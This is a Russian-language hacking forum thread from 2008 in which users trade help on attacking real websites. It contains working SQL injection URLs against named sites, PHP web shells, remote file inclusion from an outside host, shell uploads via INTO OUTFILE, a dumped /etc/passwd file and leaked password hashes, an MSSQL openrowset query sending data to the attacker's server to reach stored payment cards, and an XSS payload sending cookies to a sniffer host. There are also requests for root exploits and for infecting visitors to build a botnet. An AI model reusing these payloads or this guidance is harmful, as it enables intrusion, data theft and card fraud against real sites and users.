Просмотр полной версии : Ваши вопросы по уязвимостям.
там 7 столбцов 100% ..
как подбирать ?
http://www.moldagrotehnica.md/index.php?newsid=9999999999999+UNION+SELECT+1,2,3, 4,5,6,7+from+<table>/* где <table> самые распространенные имена, правильно?
nicusor, правильно. Есть ещё такая штука - посимвольный подбор.
Jokester
23.04.2008, 18:08
nicusor
Друг мой. Интересно зачем задавать вопрос, если не слушать ответа на него?
Специально для тебя я привёл ссылку , пройдя по которой ты увидишь вывод из таблицы
Правда в моей ссылке(как впрочем и в базе) полей 8 и если ты догадаешься убрать из неё пробелы будет гораздо проще
Пробывал залить шелл на этот сайт. Почему пишет Warning: system() [function.system]: Cannot execute a blank command in http://site.com/script.php on line 1
В скрипте обычный вызов функции систем().Пробывал с кавычками и без них)
<?php system($_GET['cmd']); ?>
GrAmOzEkA
23.04.2008, 18:26
это значит system отключено, юзай include
это значит system отключено, юзай include
это значит, что нужно писать
<?php @system($_GET['cmd']); ?>
GrAmOzEkA
23.04.2008, 18:31
это значит, что нужно писать
имхо include удобнее =), да систем почти всегда отключен.
А как её использывать ?
<?php include($_GET['cmd']); ?>
www.site.com/index.php?cmd=http://shell.ru/shell.txt
@system сработало.вот только что делать дальше не пойму))))
Хых,самое интересное что инклудить пытался так до того,как ты написал(дошло!:Р),но чёт не вышло.зато @system ошибок не вызвало.знач работает)
http://www.kat.kg/index.php?file=http://site.com/shell.php?cmd=ls+-la
Warning: forma_2(http://site.com/shell.php?cmd=ls -la) [function.forma-2]: failed to open stream: HTTP request failed! <html> in /usr/local/www/data-dist/kat/index_rus.inc on line 397
Fatal error: forma_2() [function.require]: Failed opening required 'http://site.com/shell.php?cmd=ls -la' (include_path='.') in /usr/local/www/data-dist/kat/index_rus.inc on line 397
И чойто я хз...Какой-то НТТР запрос чтоль не прокатил?)
что делать если например я в sql иньекции в поле вывода пишу скажем 123 он выводит а если пишу
<? phpinfo() ?>(через char())
он вырезает эти строки а точнее вырезается всё от наяала <?
Хочешь сделать php-инклудинг через SQL-инъекцию? о.О Вероятность такого крайне мала. Он тебе выведет <? phpinfo(); ?>, но не выполнит как пхп-код
ну я попробовал просто страннно что всё что начинается с <? до ?> обрезается или хз что там происходит и ещё например я ввожу load_file(/etc/passwd) не пишет что запрос не верный но и не выводит файл
хотя не, грузит файл
что можно извлеч из файла /etc/passwd ?
что можно извлеч из файла /etc/passwd ?
логины пользователей
например я ввожу load_file(/etc/passwd) не пишет что запрос не верный но и не выводит файл
Должно быть
LOAD_FILE('/etc/passwd')
или
LOAD_FILE("/etc/passwd")
или
LOAD_FILE(0x2F6574632F706173737764)
Если ни тот, ни другой, ни третий запрос не вывел ничего, значит, нет соответствующих прав.
fidim:x:2002:101::/:/ftponly sphera_pop:x:2002:101::/:/bin/sh root:x:0:0::/: bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin: shutdown:x:6:0:shutdown:/sbin: halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail: news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp: operator:x:11:0:operator:/root: games:x:12:100:games:/usr/games: gopher:x:13:30:gopher:/usr/lib/gopher-data: gdm:x:42:42::/home/gdm: xfs:x:43:43:X Font Server:/etc/X11/fs: nobody:x:99:99:Nobody:/: ftp:x:2002:101::/ftp/pub/anonymous:/ftponly tom:x:2002:101::/ftp/pub/tom:/ftponly support:x:2002:101::/ftp/pub/support:/ftponly spice:x:2002:101::/ftp/pub/spice:/ftponly jn:x:2002:101::/var/www/vhosts/fireflyweb:/ftponly fump:x:2002:101::/ftp/pub/fump:/ftponly meef:x:2002:101::/ftp/pub/meef:/ftponly jdelgrosso:x:2002:101::/ftp/pub/jdelgrosso:/ftponly spam:x:2002:101::/ftp/pub/spam:/ftponly manic:x:2002:101::/var/www/vhosts/manicmondays/mp3:/ftponly sdstage:x:2002:101::/var/www/vhosts/suddendeath_stage:/ftponly bugbase:x:2002:101::/var/www/html/bugbase:/ftponly sonicbids:x:2002:101::/ftp/pub/sonicbids:/ftponly
aka PSIH
24.04.2008, 16:05
Doom123
всё что начинается с <? до ?> обрезается
чисто теоретически:
<<??>? phpinfo() ?> - <??> обрежется, получится <? phpinfo() ?>
aka PSIH ты был прав) но скрипт не выполнился) вывело просто <? phpinfo()?>
кстате через иньекцию команду update можно выполнить? если да дайте плиз пример
например урла с дыркой
www.site.ru/script.php?id=-1+union+select+1,2/*
Задавал не таку давно вопрос, но не получил ни одного ответа. Попытаю удачу еще раз ;)
сканер показал что найдена папка cgi-bin и cgi-bin/formmail.pl, пробовал в браузере зайти на них пишет что таких страниц не существует, как понимать?
кстате через иньекцию команду update можно выполнить?
можно если на то права есть, в разделе sql inj я токо что выложил сайт с норм. правами попробуй его.
bag Прв хватает это root просто хочу знать как сформировать запрос
В Мускуле кроме селекта нельзя ничего выполнить.
Doom123 ну например update table1 set pole1=12345;
если я прально тя понял...
вобщем синтаксис такой
UPDATE [LOW_PRIORITY] [IGNORE] tbl_name
SET col_name1=expr1 [, col_name2=expr2 ...]
[WHERE where_definition]
[ORDER BY ...]
[LIMIT rows]
та я знаю sql я спрашиваю как это сделать через иньекцию
я ж не буду писать
www.site.ru/s?a=-1+update+table+set+col=1,2+where+id+like+1/*
можно попробовать select....+20+and+update...
но не уверен
Doom123, если прав хватает можешь как хочешь писать :)
Велемир, сам-то понял что сказал?)
ваще странно, тут права рута
http://www.filmthreat.com/index.php?section=reviews&Id=9999999999999'/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32+and+update+us ers+set+email='gg@gg.com'+where+username='jdeagnon '/*
вылетает ошибка. ' - не фильтруется
бывает :)
не придумывайте, если инъекция в select запросе, то в мускуле никакие update и иже с ними не используешь
зы про grant вобще отжиг
Во, Скиппи за Велю )))))).Теперь как всегда вопрос :
Нашёл скулю(с кем не бывает,по сто за день: )).
Нашёл таблички:
http://www.mooreindhardware.com/products.php?id=-5+union+select+1,2,table_name,4+from+information_s chema.tables--
Нашёл колонки:
http://www.mooreindhardware.com/products.php?id=-5+union+select+1,2,column_name,4+from+information_ schema.columns--
К Mysql.user закрыт доступ, ибо не руткинс:)).
И ещё: как выполнить запросы,чтобы к конкретной таблице показать конкретные колонки ?(а то хрен разберёшь)). Там цифры стоят возле каждой таблицы (4 или 2 2 2 2 2 2 )Я так понял,это количество полей в каждой таблице.
А запрос похожий видел такой :
-1+union+select+1,2,table_name,4+from+information_s chema.tables+where+column_name=login_id--
(Бред какой-то имхо) (
Интересует, почему нету последних таблиц tbmember и tblogin(долго парился,перебирая имена).Таблицы с префиксом tbl существуют, но колонки от них не подходят(я не все перебрал).Просто колонка member_id по логике должна быть в tbmember. Что за бред?! (
Constantine
24.04.2008, 19:09
Велемир из твоего поста понял процентов 10, а вообще:
А запрос похожий видел такой :
-1+union+select+1,2,table_name,4+from+information_s chema.tables+where+column_name=login_id--
такого запроса ты видеть не мог, т.к он нарушает синтаксис, очевидно login_id должно быть в hex либо к кавычках при маджик_квотс_гпс= Офф
И ещё: как выполнить запросы,чтобы к конкретной таблице показать конкретные колонки ?(а то хрен разберёшь)). Там цифры стоят возле каждой таблицы (4 или 2 2 2 2 2 2 )Я так понял,это количество полей в каждой таблице.
column_name+from+information_schema.columns+where+ table_name=hex(что -то)
Врят ли это колличество полей в таблице xD, видмо просто принтабельные колонки
Ну а почему тогда tbmember,tblogin не существуют - это не таблицы чтоли ?(.
Кстати, если выполнить как ты сказал hex(abrakadabra), где абракадабра - имя таблицы,то вернёт 'Item comming soon',а если выполнить запрос сразу *хексанутый*, то выведет :
http://www.mooreindhardware.com/products.php?id=-1+union+select+1,2,column_name,4+from+information_ schema.columns+where+table_name=0x74626C5F70686F74 6F67616C6C657279--
0x74626C5F70686F746F67616C6C657279 - это tbl_photogallery.
P.S: При запросе http://www.mooreindhardware.com/products.php?id=-1+union+select+1,2,column_name,4+from+information_ schema.columns+where+table_name=0x74626C6F67696E-- ,где
0x74626C6F67696E - это tbmember, вернуло поля
login_id,login,password,user_name,access_level
Но при запросе
http://www.mooreindhardware.com/products.php?id=-1+union+select+1,2,user_name,4+from+tblogin--
Выдаёт,что таблица не найдена. Как тут быть ?( В Hex пробывал
Jokester
24.04.2008, 20:07
Велемир
Когда ты прочитаешь хоть одну статью по скулям?
Эта таблица в другой базе
И предполагая твой следующий вопрос:
база test_sql
Вот вывод всех баз:
_http://www.mooreindhardware.com/products.php?id=-5+union+select+1,2,schema_name,3+from+information_ schema.schemata--
эньекция? http://www.line-age.ru/statistics.php?show_page=show_clan_info&indx=-1
159932, и что по твоему в этом странного?
159932, http://ru2.php.net/manual/ru/book.mssql.php
гг, вот что действительно странно
Spyder (17:17:53 12/03/2008)
Warning: mssql_query() [function.mssql-query]: message: Line 1: Incorrect syntax near '\'. (severity 15) in /bigdisk/www/html/research/alcator/program/cmod_runs.php on line 119
Spyder (17:18:07 12/03/2008)
меня глючит или это мсскл на линухе?
ettee (17:19:30 12/03/2008)
ой,спудер...
ettee (17:19:32 12/03/2008)
ом
ettee (17:19:37 12/03/2008)
наебывают?
Spyder (17:19:40 12/03/2008)
я хз
Spyder (17:20:37 12/03/2008)
http://www.psfc.mit.edu/research/alcator/program/cmod_runs.php?run=1050525'
это значит system отключено, юзай include
поржал)
Spyder, mssql может быть удаленно расположенной бд
Передал параметру одного из сайтов -1+union+select+1,2,3,4,5--
Выдало ошибку : Microsoft OLE DB Provider for SQL Server error '80040e07'
Operand type clash: ntext is incompatible with int
/news/index.asp, line 20
Кроме как cast в голову ничё не приходит. Читал, что взломать можно только сайты с ошибками 80040e14(*идеальная ошибка*).Неужели это так? ( Так мало сайтов тогда уязвимы чтоли Ж(
Предварительно подобрал количество полей.
Да и вот ещё что : попадает ли под красивый запрос такая хрень ? :
Warning: mssql_query(): message: Conversion failed when converting the nvarchar value '-1 order by 1000--' to data type int. (severity 16) in *какой-то путь к скрипту* on line 17
Вот ещё ошибка при выборе из бд -
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value 'Òàê è æèâåì' to a column of data type int.
/index.asp, line 50
Как преобразовать нормально?)
https://www.lina2.ru/clans/index.php?showclan=-1+union+select+login,password+from+accounts/*
login:pass
парль зашифрован
base64_encode(pack('H*'sha1($apss)))
Схема БД(спасибо Scipio):
http://www.lina2.ru/clans/index.php?showclan=-268520741+union+select+concat(table_schema,0x3a,ta ble_name,0x3a,column_name),null+from+information_s chema.columns+where+table_schema+like+0x6C3225/*
11099 PkdTSrZ22Jp9HBzYgkJ2yk8nEWI=
membel 9Qu39+nMMEM3kwc1Pb4882N3kt8=
koliaxtx O9yXyh2aY2gj2ExrnFhec93nGpE=
1401 lCOPqkIxlJ637ZxppwwLZ0r5JUA=
15valera15 4VQ2ikpjLNsxVM5jC5jNZD0Xr3o=
16valera16 4VQ2ikpjLNsxVM5jC5jNZD0Xr3o=
19630812 8I2BsLabPCh3DKL7U6z6dlRWfAM=
1lakosta1 hMCldvvsnfyE7bUkzRAIY7ks5R4=
1niger1 zSAcOz7JBqXyFEYnaa9qYyMgfQo=
2008 /D9xitkeYMLqfvGQ9NBpaPBSAPU=
777 /HpzTbpRjwMmCN/rBPTut58CWqc=
888 6qZ/OpPQrLCNil6P+YZvUZg7PDs=
999 r8l+oTH9fiaVqY7zQBNgj5fzTh0=
000 iu+wbEJuB6CmcaHiSItIWNaUpzA=
Вот тут ЛОгин --- ПАСС
Теоритечески можно узнать пароли ?
$a = base64_decode('iu+wbEJuB6CmcaHiSItIWNaUpzA=');
$b = unpack('H*',$a);
echo $b;
И нада брутить SHA-1 хэш
http://www.donland.ru/news.asp?Id=-1+union+select+top+1+cast(column_name+as+nvarchar) ,2,3,4,5,6,7,8,9,10+from+information_schema.column s--
Хули не выходит :(((
SQL~In[J]ecTi0n
25.04.2008, 17:49
Вопрос: есть шелл на 1 сайте.На том же сервере есть еще 2 сайта.Как к ним получить доступ(при помощи уже залитого шелла)?
Ded MustD!e
25.04.2008, 17:52
http://www.donland.ru/news.asp?Id=-1+union+select+top+1+cast(column_name+as+nvarchar) ,2,3,4,5,6,7,8,9,10+from+information_schema.column s--
Хули не выходит :(((
Это MSSQL!!!
http://www.donland.ru/news.asp?Id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+I NFORMATION_SCHEMA.TABLES)--
https://forum.antichat.ru/thread30501.html
http://www.donland.ru/news.asp?Id=1+or+1=(select+top+1+author+from+ssf_f orums)--
Выводит какую-то абракадабру.
Вот все таблицы, которые присутствуют на сервере: ).
dtproperties','ssgb2_groups','ssgb2_messages'%20,' ssgb2_messageGroups'%20,'ssgb3_groups'%20,'ssbx_ba nners'%20,'ssbx_clickLogs'%20,'ssf_forums','ssf_fo rumGroups'%20,'ssbx_showLogs','ssf_groups','ssf_me ssages','ssgb0_groups','ssgb0_messageGroups','ssgb 0_messages','ssgb1_groups','ssgb1_messageGroups',' ssgb1_messages','ssgb3_messageGroups','ssgb3_messa ges'%20,'ssis_nodes','ssm_groups','ssm_mailGroups' ,'ssm_mails','ssn_newGroups','ssn_news','ssv_answe rs','ssv_groups','ssv_voteGroups','ssv_votes','sys constraints','syssegments'.
Есть папка admin,в которую нипонятно, что вводить))))).Сомневаюсь, что в какой-то из этих папок есть что-то вроде админ или юзер ))\
Имя выводится как 'Âñå1',и чтойта ? )
Здравствуйте!
Нашёл mssql-иньекцию в одном интернет-магазинчике.
Выборку данных оттуда произвожу добавлением в строку запроса подобной штуки:
;insert+into+openrowset('sqloledb','uid=user3000;p wd=pass3000;network=DBMSSOCN;Address=777.777.103.4 ','select+line+from+base3000..tbltest')+select+tab le_name+from+information_schema.tables;--
Таким образом получаю данные на свой сервак. Страница просто перезагружается, данные заливаются ко мне, ошибки не происходит. Все довольны.
В текущей базе есть таблица Orders. В не хранится картон, но есть колонка CCOrderID. Я предполагаю, что картон хранится в другой таблице.
При заказе и оплате картон поля с реквизитами карты передаются в ccorder.asp.
Есть базы данных с именем cybersales. Думаю карты там.
Запрос select+table_name+from+cybersales.information_sche ma.tables не выполняется. Не просто не выдаёт результат на мой сервер, а именно не выполняется. Об этом я сужу по тому, что мне выдаётся HTTP 500 - Internal server error:The page cannot be displayed. А когда запрос корректно выполняется, то просто происходит перезагрузка страницы.
Видимо у текущего пользователя нет прав на просморт бд cybersales.
Делаю запрос select+name+from+master..syslogins. Получаю все логины. Есть cybersalesuser.
Запрос select+password+from+master..sysxlogins выполняется но ничего не выдаёт на мой сервер.
Каковы мой дальнейшие действия? Хочется добраться до картона. Спасибо!
Jokester
25.04.2008, 21:28
Давай так: ни о каком картоне мы не говорим,говорим о скуле(как вам конспирация? :D)
Вот так не бывает:
"cybersales.information_schema.tables"
information_schema.tables содержит все таблицы всех баз эта запись означает БАЗА-information_schema,ТАБЛИЦА-tables
Если есть база с именем cybersales то её таблицы тоже будут в information_schema.tables, а доступ к ней через точку т.е. cybersales.ТАБЛИЦА
Если ты можешь выполнить master.. то прав на просмотр скорее всего хватит хотя не 100% конечно
Давай так: ни о каком картоне мы не говорим,говорим о скуле(как вам конспирация? :D)
Вот так не бывает:
"cybersales.information_schema.tables"
information_schema.tables содержит все таблицы всех баз эта запись означает БАЗА-information_schema,ТАБЛИЦА-tables
Если есть база с именем cybersales то её таблицы тоже будут в information_schema.tables, а доступ к ней через точку т.е. cybersales.ТАБЛИЦА
Если ты можешь выполнить master.. то прав на просмотр скорее всего хватит хотя не 100% конечно
Кажется понял. Ты хочешь сказать, что по запросу select+table_name+from+information_schema.tables выводятся ВСЕ таблицы ВСЕХ баз данных? Не думаю я. Таблиц по этому запросу выводится штук 20. А баз дынных есть штук 45.
Thrasher88
25.04.2008, 22:00
Помогите, пжста! )) на сайте была найдена уязвимость XSS типа если в адресную строку вбить http://site.ru/pages/index.php?=2//какой_то_текст , то все, что стоит после цифры 2 выводится как текст на странице! Вопрос: как это можно использовать? пробовал вставлять <? system($cmd); ?> - не работает.. Вообще конечно хотелось бы просмотреть конфигурационный файл в корне сайта что бы получить доступ к БД. Извините, возможно и глупый вопрос, я просто в этом новичек.. ))
Если вставить после 2 вот это <script>alert()</script> то алерт конечно срабатывает..
http://lasgy.tln.edu.ee/?smg=news&ca=2989+or+1%3D1+--+
Сканер показал слепую инъекцию,но у мя ничё не вышло тут. Наяба ? о_О
P.S. : Есть также дыра,позволяющая выполнить произвольный код в OpenSSH.тоже от сканера :)
Уязвимость существует из-за ошибки в процедуре обработки служебных сигналов. Уязвимость позволяет злоумышленнику аварийно завершить работу сервиса OpenSSH или выполнить произвольный код в системе. Для эксплуатации уязвимости необходимо чтобы сервис использовал GSSAPI аутентификацию (параметр GSSAPIAuthentication в файле конфигурации).
Прошу не бить за лог:Р,прост сплойта в нете не нашёл,а сам написать имхо не могу =_=(Знал бы не спрашивал =)).Есть у кого какие идеи ?)
Помогите, пжста! )) на сайте была найдена уязвимость XSS типа если в адресную строку вбить http://site.ru/pages/index.php?=2//какой_то_текст , то все, что стоит после цифры 2 выводится как текст на странице! Вопрос: как это можно использовать? пробовал вставлять <? system($cmd); ?> - не работает.. Вообще конечно хотелось бы просмотреть конфигурационный файл в корне сайта что бы получить доступ к БД. Извините, возможно и глупый вопрос, я просто в этом новичек.. ))
Если вставить после 2 вот это <script>alert()</script> то алерт конечно срабатывает..
почитай вот эти статьи, найдешь много полезно про XSS:
https://forum.antichat.ru/showthread.php?t=11807
https://forum.antichat.ru/showthread.php?t=44125
https://forum.antichat.ru/showthread.php?t=42951
-=megahertz=-
26.04.2008, 12:31
привет всем!
что делать если при таком запросе -9999+UNION+SELECT+1,2,user(),4/*
ну или место юзер датабэйс и.т.д. просто появляется чистый экран.
На100ящий
26.04.2008, 12:59
www.railway.dn.ua/ru/index.php?index=4&number=1'+union+select+1,2,3,4/* как найти полную директорию для записи файла и заливки шелла????
Constantine
26.04.2008, 13:12
У тебя рутовый пользователь
POST /ru/index.php?index=4&number=1'+union+select+1,2,3,convert(user()+using+ cp1251)+from+mysql.user/* HTTP/1.0
и есть file_priv=Y, значит можешь читать\писать файлы
POST /ru/index.php?index=4&number=1'+union+select+1,2,3,convert(file_priv+usi ng+cp1251)+from+mysql.user+where+user='root'/* HTTP/1.0
Причем маджик_квотс_гпс отключены.
Твои действия: ищешь httpd.config там ищешь пути до virtualhosts, где в document_root будет лежать полный путь, далее с заливкой шелла по обстоятельствам: можно либо почитать исходники авторизации админки или какие нибудь конфиги, либо влить прямым запросом - пути и способ залить шелл через запрос можно найти здесь на форуме
немного поправлю, точное название httpd.conf или vhosts.conf
кстати наличие magic quotes становится для меня во многих случаях не актуально
https://forum.antichat.ru/showpost.php?p=663815&postcount=39
омг! пиздец
выполни phpinfo() , найди поля disable functions и скопипасть сюда
disable_function:
Local Value.
system,exec,shell_exec,passthru,popen
Master Value
system,exec,shell_exec,passthru,popen
Дальше как?
На100ящий
26.04.2008, 18:06
www.railway.dn.ua/ru/index.php?index=4&number=1'+union+select+1,2,3,4/* Знаю что надо найти *.conf чтоб увидеть полный путь.... Помогите....не получается...
0nep@t0p
26.04.2008, 20:57
Такая трабла - недавно нашел скулю на крупном сайте, начал селектить юзеров из таблицы, но вместо пассов - шифр, явно base64, но расшифровка этого шифра вернула совсем непохожую на пасс строку, думал что хеш, вроде MD5(Base64) но количество символов у разных юзеров меняется, никто не знает, что это за хеш или шифр ?
Examples: VzsGbVZoDDBValUkCCYNdw==
BWcHdAEjVChRMQQz
UWJXZwBnV25XOwUzCmM=
p.s.
Ershik
Хм, вообще то еще Constantine указал на траблу с кодировкой - convert(file_priv+using+cp1251)
Хэши - MySQL v5.x
rusanov
*2632CF75CFB8987B429348FA90905C86DF24D0A7
root
*97757F6F08362A7CBA6F30E72EB90A73C79168EE
admin
*3D07E0D0A6AB1EB78DA1D222570ED89455FB7045
dummy
*9C47AFA62907DE2D94072B9820EFCA74185D5111
Constantine
27.04.2008, 02:18
На100ящий
дефолтные пути к конфигам тут:
https://forum.antichat.ru/thread49775.html
пишешь скриптик или руками через file_priv, далее по накатанной как я написал
satana8920
27.04.2008, 11:49
я конечно прошу прощения за столь ламерский вопрос но как повесить фрейм на страницу с помощью скуль иньекции??
я конечно прошу прощения за столь ламерский вопрос но как повесить фрейм на страницу с помощью скуль иньекции??
если есть file_priv, залить шелл и повесить фрейм :)
по другому никак...
На100ящий
27.04.2008, 14:08
Constantine, уже перепробовал все пути вручную и ничего не подходит, как ещё можно найти путь???
Подскажите какую ни будь статью о добавлении новых сплоитов к связке сплоитов...
Сразу к делу.
Проблема с XSS ...
Вот она:
Когда я ввожу XSS ...
а ввожу я его в игру travian.ru он меня перемещат на мой сниффер, но я не знаю , как дать ссылку людям((
примерно вот:
Сначала ввожу: ">
потом no"><script> document.location.href="http://s.netsec.ru/60880.gif?"+encodeURI(document.cookie); </script><
т.е. там speed.travian.ru/allianz.php и всё..а надо чтоб альянс переминовался по "какой нибудь" ссылке... оч прошу - помогите(((
Но там пхп ...я в общем то хз ... попробуйте вот тут:
speed.travian.ru < зарегистрируйтесь , постройте посольство до 3 ЛВЛа... - создайте альянс \и переминуйте его в поле "ally2" ((
Если можно то ответы в 452277469 ! но сюда тоже зайду!
Заранее спасибо! :(
===т.е. мне надо СРАЗУ ссылку сделать , чтобы она переминовала альянс и выходила на линк :)
Подробно обьясню в 452277469 ! TU
Кто-небудь знает есть ли прога или скрипт для перебра лимита и сохранении результата??
SQL~In[J]ecTi0n
27.04.2008, 21:45
Кому не сложно,киньте эксплойт для Linux 2.6.9 для получения root'a.
SQL~In[J]ecTi0n
27.04.2008, 21:48
to На100ящий
Вот ссылка на оч.хорошую статью,посмотри там: https://forum.antichat.ru/thread49775.html
На100ящий
27.04.2008, 21:59
to SQL~In[J]ecTi0n
Читал её уже, хорошая статья, но не выходит!!! /etc/passwd могу прочитать, а httpd.conf найти немогу. Подскажите путь...плз
Кто-небудь знает есть ли прога или скрипт для перебра лимита и сохранении результата??
SQL Injection Pentesting TooL
Здравствуйте, прошу прощения за столь глупый вопрос, просто очень нужна помощь.
Суть такова, есть сайт на нем я нашел уязвимость XSS, когда вбиваешь в поля логина и пароля, <script>alert('xss')</script> браузер дружелюбнол выкидывает окошечко, всё как надо. Как мне применить эту уязвимость, в своих целях. Мне нужно стыбрить пароль от админки сайта.
m0rf, соц. инженерия. Берешь любой сниффер, перехватываешь запрос авторизации, потом составляешь xss'ку под сниффер вебовый и впариваешь её админу.
з.ы. если непонятно написал, стукни в пм или аську - объясню нормально)
xaker-boss
28.04.2008, 17:39
Может ли мне кто небудь объяснить что делать с этим:
http://www.s3m.com/dma/displayuser.php?user_id=-1224+union+select+1,2,3,4,concat_ws(0x4,user(),dat abase(),version()),6,7,8,9,10,11,12,13,14,15--
user: s3mcom_preylude@localhost
db: s3mcom_main
version: 4.1.22-standard
Я понимаю что это версия и названия бызы данных, ну знаю я эти данные но вить пароля у меня нету! зачем эти инекции тогда?и в каких целях их применять?
xaker-boss, инъекция как факт. Если она тебе интересна - раскручиваешь.
xaker-boss
28.04.2008, 17:55
Смысле 'раскручиваешь' ? можно поподробней?
На100ящий
28.04.2008, 18:34
Подскажите кто нибудь:
Система UNIX.
В httpd.conf прописано:
<VirtualHost *>
ServerAdmin webmaster@site.com
DocumentRoot /www/htdocs/rail
ServerName www.site.com
# ServerAlias 10.7.103.250
ServerAlias 10.7.100.4
ErrorLog /var/log/apache/railway.log
CustomLog /var/log/apache/railway.log common
</VirtualHost>
Дальше нужно записать файл в директорию /www/htdocs/rail:
www.site.com/index=4&number=1'+union+select+1,2,3,convert(текст+us ing+cp1251)+from+mysql.user+into+outfile+"\\www\\htdocs\\rail\\1.txt"/*
Вроде записалось, проверяем:
www.site.com/1.txt и нифига не получилось... Кто скажет почему???
xaker-boss, Раскручиваешь в этом случае значит "достаешь максимум информации".
Воспользовать информацией, естественно, можно в любых целях. Начиная от доступа к аккаунтам юзеров на портале(если таковые есть) до заливки шелла.
Вся "раскрутка" описана ранее в статьях.
Могу лишь привести банальный пример:
есть у меня информация типа:
http://haty.com.ua/show.php?id=-90061+union+select+1,database(),3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,user(),version(),23,2 4,25/*
5.0.45-community-log
например мне этот ресурс интересен.
Зная, что это 5 ветка MSSQL, я могу воспользоваться информацией, находящейся в infromation_schema.columns, а именно имена столбцов и полей.
17:booltxt
17:--1:text
18:cities
18:--1:text
19:kvbath
19:--1:text
20:kvdata
20:--1:date
20:--2:user
20:--3:meta
20:--4:type
20:--5:city
20:--6:strt
20:--7:stor
20:--8:high
20:--9:bath
20:--10:flor
20:--11:stat
20:--12:stot
20:--13:skit
20:--14:sliv
20:--15:dstr
20:--16:wall
20:--17:hnum
20:--18:pric
20:--19:tele
20:--20:dscr
20:--21:cnam
20:--22:ctel
20:--23:mail
20:--24:agen
21:kvfloor
21:--1:text
22:kvmeta
22:--1:text
23:kvstate
23:--1:text
24:kvtype
24:--1:text
25:kvtype1rp
25:--1:text
26:kvuser
26:--1:password
27:kvwall
27:--1:text
Например меня интересуют данные, касающиеся информации о пользователях:
http://haty.com.ua/show.php?id=-90061+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,concat_ws(0x2020,user,cnam,cte l,city,tele,mail,agen),22,23,24,25+from+kvdata+lim it+0,1--
и получаю что хотел.
Все чисто для примера.
blackybr
28.04.2008, 18:55
На100ящий не хватает прав на диру
-=megahertz=-
28.04.2008, 18:59
интересует такой вопрос...
вот я имею крупный сервер, посещает его довольно таки много человек...
можно ли через этот сайт троянить юзеров??(и как)
цель: поднять ботнет сеть.
На100ящий
28.04.2008, 19:31
Права есть 'y', рутовые....
-=megahertz=-
28.04.2008, 19:38
права над сервером полные!
}{0TT@БЬ)Ч
28.04.2008, 19:50
На100ящий
с чего ты взял что рутовые?
-=megahertz=-
можно ли через этот сайт троянить юзеровконечно можно,совсем не давно моя ася так и ушла:),благодарю того человека который ее вернул.)
ps:вот почитай http://forum.antichat.ru/thread58732.html может пригодится.
-=megahertz=-
28.04.2008, 19:53
}{0tt@БЬ)Ч
ну взял с того что я могу творить над сервером все что хочу...
-=megahertz=-, напиши в консоли whoami;id и скинь результат
-=megahertz=-
29.04.2008, 07:14
server
uid=1000(server) gid=1000(server) groups=1000(server)
Karantin
29.04.2008, 07:42
}{0tt@БЬ)Ч
ну взял с того что я могу творить над сервером все что хочу...
uid=1000(server) gid=1000(server) groups=1000(server)
это не всё что хочу, ты заблуждаешься.
даже uid=0(root) gid=0(root) groups=0(root) может не дать тебе всех прав, бывает и такое.
-=megahertz=-, напиши там же uname -a и скинь результат, или сам поищи на милворме или просто в гугле сплойт
-=megahertz=-
29.04.2008, 14:25
-=megahertz=-, напиши там же uname -a и скинь результат
Linux vs-server 2.6.18-5-xen-686 #1 SMP Mon Dec 24 20:49:58 UTC 2007 i686 GNU/Linux
Thrasher88
29.04.2008, 17:32
Была найдена такая уязвимость: на одном варез сайте есть такой сервис, что если к адресу сайта подписать такое: site.ru/?site=ваш_сайт (без HTTP://), то на всех страницах сайта будет ссылка внизу страницы на ваш_сайт! Попробова ввести такой URL вида site.ru/fol/?list="><script>alert()</script> - выскакивает аларм )) попробовал ввести в URL php код - не прлучилось, вопросительные знаки режутся. Пробовал в разных кодировках - все бестолку. Но кроме знака вопроса больше ничего не режется! Вопрос собственно такой: как еще можно навредить сайту через эту уязвимость если сайт НЕ поддерживает куки? Там вообще даже нету регистрации юзеров.
sasha008
29.04.2008, 18:13
Где можно раздобыть хорошую прогу для взлома емейла и плюс хороший словарь?
Блин нифига понять немогу
есть скуль такого вида
danko.dn.ua/news.php?id=-17+union+select+1,'<?%20system($_GET[''cmd''])%20?>',3+from+mysql.user+into+outfile+''/usr/local/www/data/admin/fckeditor/_samples/php/gif.php/'
пишет Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /usr/local/www/data/news.php
ver-5.1.22-rc
user-root@localhost
http://danko.dn.ua/admin/fckeditor/_samples/php/
даже после нормальной заливки шелла может возвращаться ошибка, и еще лучше шелл закодировать в hex, и точно кавычки не экранируются?
возможно нет прав/файл существует, вобщем по тем данным что ты дал, одназначно не скажешь
Блин нифига понять немогу
есть скуль такого вида
danko.dn.ua/news.php?id=-17+union+select+1,'<?%20system($_GET[''cmd''])%20?>',3+from+mysql.user+into+outfile+''/usr/local/www/data/admin/fckeditor/_samples/php/gif.php/'
пишет Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /usr/local/www/data/news.php
ver-5.1.22-rc
user-root@localhost
http://danko.dn.ua/admin/fckeditor/_samples/php/
попробуй LOAD_FILE если не катит, попробуй в хекс закодировать путь до файла, если опять не катит, значит file_priv отключен, тогда забей, если все ок, то шелл в хекс и заливай.
LOAD_FILE есть
file_priv -ок
и шелл кодировать пробовал
буду пробовать залить в базу а потом из базы в файл
Скажите плиз где можно почитать про SSI-уязвимости (Server Side Include)
Kuzya, _ttp://www.citforum.ru/internet/html/ssi.shtml и http://ru.wikipedia.org/wiki/SSI_(%D0%BF%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0 %BC%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B 5)
-=megahertz=-
30.04.2008, 14:03
кто подскажет как это реализовать?
Удаленный пользователь может представить специально обработанный авторизационный пакет, чтобы обойти механизм авторизации на MySQL сервере. Уязвимость расположена в check_scramble_323() функции.
POST /index.php?id=211 HTTP/1.0
Accept: */*
